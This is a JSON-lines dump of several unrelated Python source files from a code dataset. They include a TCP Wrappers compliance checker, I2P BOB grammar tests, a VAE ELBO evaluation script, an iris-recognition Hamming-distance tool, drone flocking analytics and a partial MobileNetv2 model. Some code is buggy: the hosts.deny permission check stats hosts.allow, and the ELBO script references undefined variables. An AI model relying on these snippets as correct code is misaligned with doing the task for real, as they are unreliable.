check_tcp_wrappers_is_installed():\n config = 'Ensure TCP Wrappers is installed (Scored)'\n\n command1 = 'rpm -q tcp_wrappers'\n command2 = 'rpm -q tcp_wrappers-libs'\n output = 'not installed'\n\n print('checking \"' + config + '\" ..... ')\n\n terminal_variable = os.popen(command1)\n terminal_output1 = terminal_variable.read()\n\n terminal_variable = os.popen(command2)\n terminal_output2 = terminal_variable.read()\n\n if output in terminal_output1 and output in terminal_output2:\n source.return_function(False, config)\n else:\n source.return_function(True, config)\n\n\n# --- 3.4.3 Ensure /etc/hosts.deny is configured (Scored) ---- #\n\ndef check_etc_hosts_deny_is_configured():\n config = '3.4.3 Ensure /etc/hosts.deny is configured (Scored)'\n command = 'cat /etc/hosts.deny'\n output = 'ALL: ALL'\n source.output_isIn_terminal_output(config, command, output)\n\n\n# ---- 3.4.4 Ensure permissions on /etc/hosts.allow are configured (Scored) ---#\n\ndef check_permissions_on_etc_hosts_allow_isConfigured():\n config = '3.4.4 Ensure permissions on /etc/hosts.allow are configured (Scored)'\n command = 'stat /etc/hosts.allow'\n output = 'Access:(0644/-rw-r--r--)Uid:(0/root)Gid:(0/root)'\n\n print('checking \"' + config + '\" ..... ')\n terminal_variable = os.popen(command)\n terminal_output = terminal_variable.read().replace(' ', '')\n\n if output in terminal_output:\n source.return_function(True, config)\n else:\n source.return_function(False, config)\n\n\n# ---- 3.4.4 Ensure permissions on /etc/hosts.deny are configured (Scored) ---#\n\ndef check_permissions_on_etc_hosts_deny_isConfigured():\n config = '3.4.5 Ensure permissions on /etc/hosts.deny are configured (Scored)'\n command = 'stat /etc/hosts.allow'\n output = 'Access:(0644/-rw-r--r--)Uid:(0/root)Gid:(0/root)'\n\n print('checking \"' + config + '\" ..... ')\n terminal_variable = os.popen(command)\n terminal_output = terminal_variable.read().replace(' ', '')\n\n if output in terminal_output:\n source.return_function(True, config)\n\n else:\n source.return_function(False, config)\n","sub_path":"networkConfiguration/tcpWrappers.py","file_name":"tcpWrappers.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"226834471","text":"\"\"\"\nconclusions.py\n\n* Copyright (c) 2006-2009, University of Colorado.\n* All rights reserved.\n*\n* Redistribution and use in source and binary forms, with or without\n* modification, are permitted provided that the following conditions are met:\n* * Redistributions of source code must retain the above copyright\n* notice, this list of conditions and the following disclaimer.\n* * Redistributions in binary form must reproduce the above copyright\n* notice, this list of conditions and the following disclaimer in the\n* documentation and/or other materials provided with the distribution.\n* * Neither the name of the University of Colorado nor the\n* names of its contributors may be used to endorse or promote products\n* derived from this software without specific prior written permission.\n*\n* THIS SOFTWARE IS PROVIDED BY THE UNIVERSITY OF COLORADO ''AS IS'' AND ANY\n* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n* DISCLAIMED. IN NO EVENT SHALL THE UNIVERSITY OF COLORADO BE LIABLE FOR ANY\n* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n#import confidence\nimport samples\n\n__ALL_SAMPLES = 0\n\ncurState = 0\n\nconclusions = [\"no process\", ]\nspecial = {\"outlier\":__ALL_SAMPLES}\n \ndef reset():\n \"\"\"\n Resets the conclusion state for starting up a new set of samples.\n Call this in between each thingymajig\n \"\"\"\n global curState\n curState = 0\n\ndef getConclusions():\n \"\"\"\n this function returns the list of conclusions that the engine should argue about. All\n parameters should be pre-entered.\n \"\"\"\n \n #can't do this with a list comprehension. Sigh.\n result = []\n for conclusion in conclusions:\n if conclusion in special:\n result.extend(__fillParams(conclusion))\n else:\n result.append(Conclusion(conclusion))\n \n return result\n\n \ndef __fillParams(conclusion):\n \"\"\"\n fills in parameters for conclusions and then returns the appropriate list of conclusion objects \n based on the type ID passed in.\n \"\"\"\n \n #conclusions should never be passed here anymore unless they're special ones\n \n if special[conclusion] == __ALL_SAMPLES:\n return [Conclusion(conclusion, [sample]) for sample in samples.sampleList]\n\nclass Conclusion:\n \"\"\"\n Contains the symbol (name) of a specific instance of a conclusion plus the list of arguments\n applicable to this specific conclusion (like outlier x).\n \n Also represents the same thing but with arguments filled in (like outlier 2)\n \"\"\"\n def __init__(self, name, paramList=None):\n self.name = name\n self.paramList = paramList\n if paramList is not None and len(paramList) == 0:\n self.paramList = None\n \n def __eq__(self, other):\n if isinstance(other, Conclusion):\n return self.name == other.name and \\\n (self.paramList is None and other.paramList is None or \\\n (self.paramList is not None and other.paramList is not None and\n len(self.paramList) == len(other.paramList)))\n else:\n return False\n \n def __repr__(self):\n st = self.name.title()\n if self.paramList is not None:\n st += ': ' + ', '.join([str(param) for param in self.paramList]) #+ ')'\n return st\n \n def buildEnv(self, filledConc):\n \"\"\"\n builds an initial environment from this conclusion and a filled version of the\n same conclusion (passed as a parameter). Initial environment values are also\n included in the result. Environments are dictionaries.\n \"\"\"\n \n if self.paramList is None and filledConc.paramList is None:\n return samples.initEnv.copy()\n \n if self.paramList is None or \\\n filledConc.paramList is None or \\\n len(filledConc.paramList) != len(self.paramList):\n raise ValueError(\"Attempt to use a rule with incorrect number of conclusion parameters\")\n \n env = dict(zip(self.paramList, filledConc.paramList))\n \n env.update(samples.initEnv)\n \n #if self.name == 'representative sample' or self.name == 'outlier':\n # print self, env\n return env\n \n \n\n \n","sub_path":"src/calvin/reasoning/conclusions.py","file_name":"conclusions.py","file_ext":"py","file_size_in_byte":4779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"323259197","text":"# Copyright (c) str4d \n# See COPYING for details.\n\nimport unittest\n\nfrom parsley import makeGrammar, ParseError\n\nfrom txi2p.grammar import bobGrammarSource\n\n\nbobGrammar = makeGrammar(bobGrammarSource, {})\n\ndef stringParserFromRule(grammar, rule):\n def parseString(s):\n return getattr(grammar(s), rule)()\n return parseString\n\n\nclass TestBOBGrammar(unittest.TestCase):\n def _test(self, rule, data, expected):\n parse = stringParserFromRule(bobGrammar, rule)\n result = parse(data)\n self.assertEqual(result, expected)\n\n def test_BOB_clear(self):\n self._test('BOB_clear', 'OK cleared\\n', (True, 'cleared'))\n self._test('BOB_clear', 'ERROR tunnel is active\\n', (False, 'tunnel is active'))\n\n def test_BOB_getdest(self):\n self._test('BOB_getdest', 'OK spam\\n', (True, 'spam'))\n\n def test_BOB_getkeys(self):\n self._test('BOB_getkeys', 'OK spameggs\\n', (True, 'spameggs'))\n\n def test_BOB_list(self):\n spam = {\n 'nickname': 'spam',\n 'starting': False,\n 'running': True,\n 'stopping': False,\n 'keys': True,\n 'quiet': False,\n 'inport': '12345',\n 'inhost': 'localhost',\n 'outport': '23456',\n 'outhost': 'localhost'\n }\n eggs = {\n 'nickname': 'eggs',\n 'starting': False,\n 'running': False,\n 'stopping': False,\n 'keys': True,\n 'quiet': False,\n 'inport': 'not_set',\n 'inhost': 'localhost',\n 'outport': 'not_set',\n 'outhost': 'localhost'\n }\n\n self._test('BOB_list', 'OK Listing done\\n', (True, 'Listing done', []))\n self._test('BOB_list', 'DATA NICKNAME: spam STARTING: false RUNNING: true STOPPING: false KEYS: true QUIET: false INPORT: 12345 INHOST: localhost OUTPORT: 23456 OUTHOST: localhost\\nDATA NICKNAME: eggs STARTING: false RUNNING: false STOPPING: false KEYS: true QUIET: false INPORT: not_set INHOST: localhost OUTPORT: not_set OUTHOST: localhost\\nOK Listing done\\n', (True, 'Listing done', [spam, eggs]))\n self._test('BOB_list', 'ERROR ni!\\n', (False, 'ni!', []))\n","sub_path":"txi2p/test/test_grammar.py","file_name":"test_grammar.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"376555368","text":"import torch\nimport math\n\n\ndef estimate_entropies(qz_samples, qz_params, q_dist):\n \"\"\"Computes the term:\n E_{p(x)} E_{q(z|x)} [-log q(z)]\n and\n E_{p(x)} E_{q(z_j|x)} [-log q(z_j)]\n where q(z) = 1/N sum_n=1^N q(z|x_n).\n\n Assumes samples are from q(z|x) for *all* x in the dataset.\n Assumes that q(z|x) is factorial ie. q(z|x) = prod_j q(z_j|x).\n\n Computes numerically stable NLL:\n - log q(z) = log N - logsumexp_n=1^N log q(z|x_n)\n\n Inputs:\n -------\n qz_samples (K, S) Variable\n qz_params (N, K, nparams) Variable\n \"\"\"\n\n # Only take a sample subset of the samples\n qz_samples = qz_samples.index_select(1, Variable(torch.randperm(qz_samples.size(1))[:10000].cuda()))\n\n K, S = qz_samples.size()\n N, _, nparams = qz_params.size()\n assert(nparams == q_dist.nparams)\n assert(K == qz_params.size(1))\n\n marginal_entropies = torch.zeros(K).cuda()\n joint_entropy = torch.zeros(1).cuda()\n\n pbar = tqdm(total=S)\n k = 0\n while k < S:\n batch_size = min(10, S - k)\n logqz_i = q_dist.log_density(\n qz_samples.view(1, K, S).expand(N, K, S)[:, :, k:k + batch_size],\n qz_params.view(N, K, 1, nparams).expand(N, K, S, nparams)[:, :, k:k + batch_size])\n k += batch_size\n\n # computes - log q(z_i) summed over minibatch\n marginal_entropies += (math.log(N) - logsumexp(logqz_i, dim=0, keepdim=False).data).sum(1)\n # computes - log q(z) summed over minibatch\n logqz = logqz_i.sum(1) # (N, S)\n joint_entropy += (math.log(N) - logsumexp(logqz, dim=0, keepdim=False).data).sum(0)\n pbar.update(batch_size)\n pbar.close()\n\n marginal_entropies /= S\n joint_entropy /= S\n\n return marginal_entropies, joint_entropy\n\n\ndef elbo_decomposition(z_dim, nparams, dataset_loader):\n n = len(dataset_loader.dataset)\n S = 1\n\n print('Computing q(z|x) distributions.')\n # compute the marginal q(z_j|x_n) distributions\n qz_params = torch.Tensor(n, z_dim, nparams)\n\n n = 0\n logpx = 0\n\n for xs in dataset_loader:\n batch_sz = xs.size(0)\n xs = Variable(xs.view(batch_size, -1, 64, 64).cuda(), volatile=True)\n z_params = vae.encoder.forward(xs).view(batch_size, K, nparams)\n qz_params[n:n + batch_size] = z_params.data\n n += batch_size\n\n # estimate reconstruction term\n for _ in range(S):\n z = vae.q_dist.sample(params=z_params)\n x_params = vae.decoder.forward(z)\n logpx += vae.x_dist.log_density(xs, params=x_params).view(batch_size, -1).data.sum()\n\n logpx = logpx / (N * S)\n\n qz_params = Variable(qz_params.cuda(), volatile=True)\n\n print('Sampling from q(z).')\n # sample S times from each marginal q(z_j|x_n)\n qz_params_expanded = qz_params.view(N, K, 1, nparams).expand(N, K, S, nparams)\n qz_samples = vae.q_dist.sample(params=qz_params_expanded)\n qz_samples = qz_samples.transpose(0, 1).contiguous().view(K, N * S)\n\n print('Estimating entropies.')\n marginal_entropies, joint_entropy = estimate_entropies(qz_samples, qz_params, vae.q_dist)\n\n if hasattr(vae.q_dist, 'NLL'):\n nlogqz_condx = vae.q_dist.NLL(qz_params).mean(0)\n else:\n nlogqz_condx = - vae.q_dist.log_density(qz_samples,\n qz_params_expanded.transpose(0, 1).contiguous().view(K, N * S)).mean(1)\n\n if hasattr(vae.prior_dist, 'NLL'):\n pz_params = vae._get_prior_params(N * K).contiguous().view(N, K, -1)\n nlogpz = vae.prior_dist.NLL(pz_params, qz_params).mean(0)\n else:\n nlogpz = - vae.prior_dist.log_density(qz_samples.transpose(0, 1)).mean(0)\n\n # nlogqz_condx, nlogpz = analytical_NLL(qz_params, vae.q_dist, vae.prior_dist)\n nlogqz_condx = nlogqz_condx.data\n nlogpz = nlogpz.data\n\n # Independence term\n # KL(q(z)||prod_j q(z_j)) = log q(z) - sum_j log q(z_j)\n dependence = (- joint_entropy + marginal_entropies.sum())[0]\n\n # Information term\n # KL(q(z|x)||q(z)) = log q(z|x) - log q(z)\n information = (- nlogqz_condx.sum() + joint_entropy)[0]\n\n # Dimension-wise KL term\n # sum_j KL(q(z_j)||p(z_j)) = sum_j (log q(z_j) - log p(z_j))\n dimwise_kl = (- marginal_entropies + nlogpz).sum()\n\n # Compute sum of terms analytically\n # KL(q(z|x)||p(z)) = log q(z|x) - log p(z)\n analytical_cond_kl = (- nlogqz_condx + nlogpz).sum()\n\n print('Dependence: {}'.format(dependence))\n print('Information: {}'.format(information))\n print('Dimension-wise KL: {}'.format(dimwise_kl))\n print('Analytical E_p(x)[ KL(q(z|x)||p(z)) ]: {}'.format(analytical_cond_kl))\n print('Estimated ELBO: {}'.format(logpx - analytical_cond_kl))\n\n return logpx, dependence, information, dimwise_kl, analytical_cond_kl, marginal_entropies, joint_entropy\n\n\nif __name__ == '__main__':\n\n vae, dataset_loader = load_model_and_dataset(args.checkpt)\n logpx, dependence, information, dimwise_kl, analytical_cond_kl, marginal_entropies, joint_entropy = \\\n elbo_decomposition(vae, dataset_loader)\n torch.save({\n 'logpx': logpx,\n 'dependence': dependence,\n 'information': information,\n 'dimwise_kl': dimwise_kl,\n 'analytical_cond_kl': analytical_cond_kl,\n 'marginal_entropies': marginal_entropies,\n 'joint_entropy': joint_entropy\n }, os.path.join(args.save, 'elbo_decomposition.pth'))\n","sub_path":"elbo_evaluation.py","file_name":"elbo_evaluation.py","file_ext":"py","file_size_in_byte":5396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"605747860","text":"#!usr/bin/python\nimport sys\nfrom os import path\nimport numpy as np\n\nfrom convolver import EyeCoord, GaborFunc, ImgToBinSpectrum, HammingDist, FitToRange255, LogGaborFunc\nfrom PIL import Image\nfrom multiprocessing import Pool\n\nimport cProfile\n\ndef get_data_dict(data_path, imgs_path):\n\tres_dict = dict()\n\twith open(data_path, 'r') as data_file:\n\t\ti = 0\n\t\tk = 0\n\t\tfor line in data_file:\n\t\t\tline_items = line.split()\n\t\t\timg_name = line_items[0]\n\t\t\tk += 1\n\t\t\tif path.exists(imgs_path + '/' + img_name):\n\t\t\t\ti += 1\n\t\t\t\tres_dict[img_name] = EyeCoord(\tx1=np.array([int(i) for i in line_items[6:8]]),\n\t\t\t\t\t\t\t\t\t\t\t\tr1=int(line_items[8]),\n\t\t\t\t\t\t\t\t\t\t\t\tx2=np.array([int(i) for i in line_items[11:13]]),\n\t\t\t\t\t\t\t\t\t\t\t\tr2=int(line_items[13]))\n\tprint(i, k)\n\treturn res_dict\n\n\ndef is_test_img(name):\n#\treturn 1\n\treturn int(name[:4]) in range(2001, 2151)\n\t#return 'R' in name and int(name[:4]) in range(2001, 2151)\n\t#return 'L' in name and int(name[:4]) in range(2001, 2151)\n\n\ndef ImageSpectrum(arg_tuple):\n\teye_name, eye_coord, imgs_path = arg_tuple\n\tspectr_size = (256, 64)\n\tsigma = 17\n\tT = 8\n\timg_path = imgs_path + '/' + eye_name\n\treturn ImgToBinSpectrum(img_path, eye_coord, spectr_size, LogGaborFunc, S=1/sigma, W=1/T)\n\t#return ImgToBinSpectrum(img_path, eye_coord, spectr_size, GaborFunc, S=1/sigma, W=1/T)\n\ndef HammDistMatrix(imgs_path, imgs_dict):\n\tdist_same = []\n\tdist_diff = []\n\t\n\timg_to_idx = dict()\n\tidx_to_img = dict()\n\tpool = Pool(4)\n\n\tfor idx, (eye_name, _) in enumerate(imgs_dict.items()):\n\t\timg_to_idx[eye_name] = idx\n\t\tidx_to_img[idx] = eye_name\n\n\targ_tuples = list(zip(imgs_dict.keys(), imgs_dict.values(), [imgs_path] * len(imgs_dict)))\n\n\tspectrums = pool.map(ImageSpectrum, arg_tuples)\n\n\tassert len(imgs_dict) == len(spectrums)\n\timg_to_spectrum = dict(zip(imgs_dict.keys(), spectrums))\n\n\tfor x in range(len(imgs_dict)):\n\t\tspectr_x = img_to_spectrum[idx_to_img[x]]\n\t\tfor y in range(x + 1, len(imgs_dict)):\n\t\t\tspectr_y = img_to_spectrum[idx_to_img[y]]\n\n\t\t\tdist = HammingDist(spectr_x, spectr_y)\n\t\t\tprint(dist)\n\t\t\t#Image.fromarray(FitToRange255(spectr_x).T, 'L').save('./tmp/spectr_' + idx_to_img[x])\n\t\t\tif idx_to_img[y][:5] == idx_to_img[x][:5]:\n\t\t\t\tdist_same.append(dist)\n\t\t\t\t#print('same', idx_to_img[y], idx_to_img[x], '->', dist)\n\t\t\telse:\n\t\t\t\tdist_diff.append(dist)\n\t\t\t\t#print('diff', idx_to_img[y], idx_to_img[x], '->', dist)\n\n\treturn dist_same, dist_diff\n\n\nif __name__ == '__main__':\n\tif len(sys.argv) < 3:\n\t\tprint('Not enough args')\n\t\tsys.exit(1)\n\n\n#\ttry:\n\n\tdata_path = sys.argv[1]\n\timgs_path = sys.argv[2]\n\n\tdata_dict = get_data_dict(data_path, imgs_path)\n\tprint(len(data_dict))\n\ttest_set = dict((key,value) for key, value in data_dict.items() if is_test_img(key))\n\tprint(len(test_set))\n\n\t#cProfile.run('HammDistMatrix(imgs_path, dict(list(test_set.items())[:50]))')\n\tsame, diff = HammDistMatrix(imgs_path, test_set)\n\tf = open('same.txt', 'w')\n\tf.write(' '.join([str(int(j)) for j in same]))\n\tf.close()\n\tf = open('diff.txt', 'w')\n\tf.write(' '.join([str(i) for i in list(diff)]))\n\tf.close()\n\n#\texcept Exception as e:\n#\t\tprint(e)\n#\t\tsys.exit(1)","sub_path":"img_data.py","file_name":"img_data.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"205930412","text":"import pickle\nfrom helper.Reynolds import *\nfrom helper.MRSAnalytics import *\nfrom helper.Plotter import *\nfrom helper.Trainer import *\nfrom helper.DataGenerator import *\nfrom torch.distributions import *\nfrom mrsgym.Util import *\nimport os\nfrom matplotlib import pyplot as plt\n\n\n\ndef main():\n\t# Parameters\n\tN = 12\n\tD = 6\n\tK = 1\n\tCOMM_RANGE = 2.5\n\tdatapoints = 1000\n\tepisode_length = 200\n\theadless = True\n\tleader = True\n\t# File Paths\n\tdir_path = \"data\"\n\tevaldata_path = os.path.join(dir_path, \"%s_data.pt\")\n\ttry:\n\t\tos.mkdir(dir_path)\n\texcept FileExistsError:\n\t\tpass\n\t# Initialise Models\n\treynolds = Reynolds(N, D, 1, 3)\n\tmodels = {\"reynolds\": reynolds, \"random\": RandomController(OUT_DIM=3)} # we will compare reynolds flocking to a random model\n\t# Create Environment\n\tz = Uniform(low=2.0*torch.ones(N,1), high=5.0*torch.ones(N,1))\n\txy_normal = Normal(torch.zeros(N,2), 1.0)\n\tdist = CombinedDistribution([xy_normal, z], mixer='cat', dim=1) # create custom starting state distribution\n\tenv = gym.make('mrs-v0', state_fn=state_fn, update_fn=update_fn, N_AGENTS=N, START_POS=dist, K_HOPS=1, COMM_RANGE=COMM_RANGE, ACTION_TYPE='set_target_vel', HEADLESS=headless)\n\tstartpos = [env.generate_start_pos() for _ in range(int(datapoints/episode_length*2))]\n\tenv.START_POS = StartPosGenerator(startpos) # use the same starting state for each model\n\t# Generate and Analyse Data\n\tanalysers = {}\n\tfor name, model in models.items():\n\t\tprint(name)\n\t\tdata = Trainer(K=K)\n\t\tis_data_loaded = data.load_trainer(path=evaldata_path % name) # load simulation data if it exists\n\t\tif not is_data_loaded: # generate data if it does not exist\n\t\t\tdata.save_trainer_onexit(path=evaldata_path % name)\n\t\t\tsimulate(env=env, model=model, trainer=data, datapoints=datapoints, episode_length=episode_length, leader=leader)\n\t\tanalysers[name] = MRSAnalytics(data) # compute flocking metrics (separation, cohesion, leader dist)\n\t\tanalysers[name].name = name\n\t# Draw Plots\n\tplot_separation(*analysers.values())\n\tplot_cohesion(*analysers.values())\n\tplot_leader_dist(*analysers.values())\n\t# Show\n\tshow_plots()\n\n\n\ndef state_fn(quad):\n\treturn torch.cat([quad.get_pos(), quad.get_vel()])\n\ndef update_fn(env, action, **kwargs):\n\tfor i, agent in enumerate(env.agents):\n\t\tenv.add_line(start=[0.,0.,0.], end=action[i,:], parent=agent, name=\"line_%d\" % i, colour=[0.,0.,1.])\n\ndef simulate(env, model, leader=False, **kwargs):\n\tif leader:\n\t\tleader_action_policy = RandomAction()\n\t\taction_fn = leader_action_policy.action_fn\n\t\tenvironment = env.get_env()\n\t\tleader_agent = environment.agents[0]\n\t\tenvironment.set_colour(leader_agent, [1.,0.,0.])\n\telse:\n\t\taction_fn = lambda action, state: action\n\tenv.START_POS.reset()\n\tdata = generate_mrs(env, model=model, action_fn=action_fn, **kwargs)\n\treturn data\n\ndef plot_separation(*analysers):\n\tseparations = [analyser.separation().permute(0,2,1).reshape(analyser.N*analyser.num_episodes, analyser.episode_length) for analyser in analysers]\n\tnames = [analyser.name for analyser in analysers]\n\tplot_time_distribution(data=separations, labels=names, xlabel=\"Time Step\", ylabel=\"Separation from Nearest Neighbor\", title=\"\", ignorenan=True)\n\tfor name, separation in zip(names, separations):\n\t\tsep = separation.reshape(-1)\n\t\tmean = mean_ignorenan(sep.unsqueeze(1))[0]\n\t\tmedian = median_ignorenan(sep.unsqueeze(1))[0]\n\t\tstd = std_ignorenan(sep.unsqueeze(1))[0]\n\t\tprint(\"%s Separation: median=%g, mean=%g, std=%g\" % (name, median, mean, std))\n\ndef plot_cohesion(*analysers):\n\tcohesions = [analyser.cohesion() for analyser in analysers]\n\tnames = [analyser.name for analyser in analysers]\n\tplot_time_distribution(data=cohesions, labels=names, xlabel=\"Time Step\", ylabel=\"Diameter of Smallest Sphere that Contains all Agents\", title=\"\", ignorenan=True)\n\tfor name, cohesion in zip(names, cohesions):\n\t\tcoh = cohesion.reshape(-1)\n\t\tmean = mean_ignorenan(coh.unsqueeze(1))[0]\n\t\tmedian = median_ignorenan(coh.unsqueeze(1))[0]\n\t\tstd = std_ignorenan(coh.unsqueeze(1))[0]\n\t\tprint(\"%s Cohesion: median=%g, mean=%g, std=%g\" % (name, median, mean, std))\n\ndef plot_leader_dist(*analysers):\n\tdists = [analyser.dist_to_leader() for analyser in analysers]\n\tnames = [analyser.name for analyser in analysers]\n\tplot_time_distribution(data=dists, labels=names, xlabel=\"Time Step\", ylabel=\"Distance from the Center of the Swarm to the Leader\", title=\"\", ignorenan=True)\n\tfor name, dist in zip(names, dists):\n\t\tleader_dist = dist.reshape(-1)\n\t\tmean = mean_ignorenan(leader_dist.unsqueeze(1))[0]\n\t\tmedian = median_ignorenan(leader_dist.unsqueeze(1))[0]\n\t\tstd = std_ignorenan(leader_dist.unsqueeze(1))[0]\n\t\tprint(\"%s Leader Dist: median=%g, mean=%g, std=%g\" % (name, median, mean, std))\n\ndef loss_fn(output, target):\n\tloss = torch.nn.MSELoss()(output, target.double())\n\tloss_dict = {\"Loss\": loss}\n\treturn loss_dict\n\n# Generates an off-policy random action (used for creating a leader)\nclass RandomAction:\n\n\tdef __init__(self):\n\t\ttorch.manual_seed(0)\n\t\tself.target_vel = torch.zeros(3)\n\t\tself.sigma = 0.05\n\t\tself.maxspeed = 1.0\n\t\tself.dist = Normal(self.target_vel, self.sigma)\n\n\tdef action_fn(self, action, state):\n\t\t# Update target_vel\n\t\tself.dist = Normal(self.target_vel, self.sigma)\n\t\tself.target_vel = self.dist.sample()\n\t\tmag = self.target_vel.norm()\n\t\tself.target_vel *= self.maxspeed / max(mag, self.maxspeed)\n\t\t# Set Leader Velocity\n\t\taction[0,:] = self.target_vel\n\t\treturn action\n\n# Stores the starting states in simulation so they can be reused with other models for consistency\nclass StartPosGenerator:\n\n\tdef __init__(self, pos_list):\n\t\tself.pos_list = pos_list\n\t\tself.i = 0\n\n\tdef sample(self):\n\t\tstartpos = self.pos_list[self.i]\n\t\tself.i += 1\n\t\treturn startpos\n\n\tdef reset(self):\n\t\tself.i = 0\n\n# Random model\nclass RandomController:\n\n\tdef __init__(self, OUT_DIM):\n\t\tself.OUT_DIM = OUT_DIM\n\n\tdef forward(self, A, X):\n\t\tbatch, N, D, K = X.shape\n\t\treturn torch.randn(batch, N, self.OUT_DIM)\n\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"examples/simulating_data/analytics.py","file_name":"analytics.py","file_ext":"py","file_size_in_byte":5897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"249747793","text":"\"\"\"MobileNet v2 models for Keras.\n# Reference\n- [Inverted Residuals and Linear Bottlenecks Mobile Networks for\n Classification, Detection and Segmentation]\n (https://arxiv.org/abs/1801.04381)\n\"\"\"\n\nfrom keras.models import Model, Sequential\nfrom keras.layers import Input, Conv2D, GlobalAveragePooling2D, Dropout, Flatten\nfrom keras.layers import Activation, BatchNormalization, add, Reshape, Dense\nfrom keras.applications.mobilenet import relu6, DepthwiseConv2D\nfrom keras.utils.vis_utils import plot_model\nfrom keras.applications import mobilenet\n\nfrom keras import backend as K\n\n\ndef _conv_block(inputs, filters, kernel, strides):\n \"\"\"Convolution Block\n This function defines a 2D convolution operation with BN and relu6.\n # Arguments\n inputs: Tensor, input tensor of conv layer.\n filters: Integer, the dimensionality of the output space.\n kernel: An integer or tuple/list of 2 integers, specifying the\n width and height of the 2D convolution window.\n strides: An integer or tuple/list of 2 integers,\n specifying the strides of the convolution along the width and height.\n Can be a single integer to specify the same value for\n all spatial dimensions.\n # Returns\n Output tensor.\n \"\"\"\n\n channel_axis = 1 if K.image_data_format() == 'channels_first' else -1\n\n x = Conv2D(filters, kernel, padding='same', strides=strides)(inputs)\n x = BatchNormalization(axis=channel_axis)(x)\n return Activation(relu6)(x)\n\n\ndef _bottleneck(inputs, filters, kernel, t, s, r=False):\n \"\"\"Bottleneck\n This function defines a basic bottleneck structure.\n # Arguments\n inputs: Tensor, input tensor of conv layer.\n filters: Integer, the dimensionality of the output space.\n kernel: An integer or tuple/list of 2 integers, specifying the\n width and height of the 2D convolution window.\n t: Integer, expansion factor.\n t is always applied to the input size.\n s: An integer or tuple/list of 2 integers,specifying the strides\n of the convolution along the width and height.Can be a single\n integer to specify the same value for all spatial dimensions.\n r: Boolean, Whether to use the residuals.\n # Returns\n Output tensor.\n \"\"\"\n\n channel_axis = 1 if K.image_data_format() == 'channels_first' else -1\n tchannel = K.int_shape(inputs)[channel_axis] * t\n\n x = _conv_block(inputs, tchannel, (1, 1), (1, 1))\n\n x = DepthwiseConv2D(kernel, strides=(s, s), depth_multiplier=1, padding='same')(x)\n x = BatchNormalization(axis=channel_axis)(x)\n x = Activation(relu6)(x)\n\n x = Conv2D(filters, (1, 1), strides=(1, 1), padding='same')(x)\n x = BatchNormalization(axis=channel_axis)(x)\n\n if r:\n x = add([x, inputs])\n return x\n\n\ndef _inverted_residual_block(inputs, filters, kernel, t, strides, n):\n \"\"\"Inverted Residual Block\n This function defines a sequence of 1 or more identical layers.\n # Arguments\n inputs: Tensor, input tensor of conv layer.\n filters: Integer, the dimensionality of the output space.\n kernel: An integer or tuple/list of 2 integers, specifying the\n width and height of the 2D convolution window.\n t: Integer, expansion factor.\n t is always applied to the input size.\n s: An integer or tuple/list of 2 integers,specifying the strides\n of the convolution along the width and height.Can be a single\n integer to specify the same value for all spatial dimensions.\n n: Integer, layer repeat times.\n # Returns\n Output tensor.\n \"\"\"\n\n x = _bottleneck(inputs, filters, kernel, t, strides)\n\n for i in range(1, n):\n x = _bottleneck(x, filters, kernel, t, 1, True)\n\n return x\n\n\ndef MobileNetv2(input_shape, k):\n \"\"\"MobileNetv2\n This function defines a MobileNetv2 architectures.\n # Arguments\n input_shape: An integer or tuple/list of 3 integers, shape\n of input tensor.\n k: Integer, number of classes.\n # Returns\n MobileNetv2 model.\n \"\"\"\n\n # inputs = Input(shape=input_shape)\n # x = _conv_block(inputs, 32, (3, 3), strides=(2, 2))\n #\n # x = _inverted_residual_block(x, 16, (3, 3), t=1, strides=1, n=1)\n # x = _inverted_residual_block(x, 24, (3, 3), t=6, strides=2, n=2)\n # x = _inverted_residual_block(x, 32, (3, 3), t=6, strides=2, n=3)\n # x = _inverted_residual_block(x, 64, (3, 3), t=6, strides=2, n=4)\n # x = _inverted_residual_block(x, 96, (3, 3), t=6, strides=1, n=3)\n # x = _inverted_residual_block(x, 160, (3, 3), t=6, strides=2, n=3)\n # x = _inverted_residual_block(x, 320, (3, 3), t=6, strides=1, n=1)\n #\n # x = _conv_block(x, 1280, (1, 1), strides=(1, 1))\n # x = GlobalAveragePooling2D()(x)\n # x = Reshape((1, 1, 1280))(x)\n # x = Dropout(0.3, name='Dropout')(x)\n # x = Conv2D(k, (1, 1), padding='same')(x)\n #\n # x = Activation('softmax', name='softmax')(x)\n # output = Reshape((k,))(x)\n #\n # model = Model(inputs, output)\n # plot_model(model, to_file='images/MobileNetv2.png', show_shapes=True)\n\n # model = Sequential()\n # mob = mobilenet.MobileNet(input_shape=input_shape, alpha=1.0, depth_multiplier=1, dropout=1e-3, include_top=True,\n # weights='imagenet', input_tensor=None, pooling=None, classes=1000)\n # model.add(Dense(1000, input_shape=(26,)))\n # model.add(mob)\n #\n # model.layers.pop()\n # output = Reshape((26,))\n # # model.add(output)\n # # model2 = Model(model.input, output)\n # for i in model.layers:\n # print(i)\n\n # load vgg16 without dense layer and with theano dim ordering\n base_model = mobilenet.MobileNet(weights='imagenet', include_top=False, input_shape=(128, 128, 3))\n\n # number of classes in your 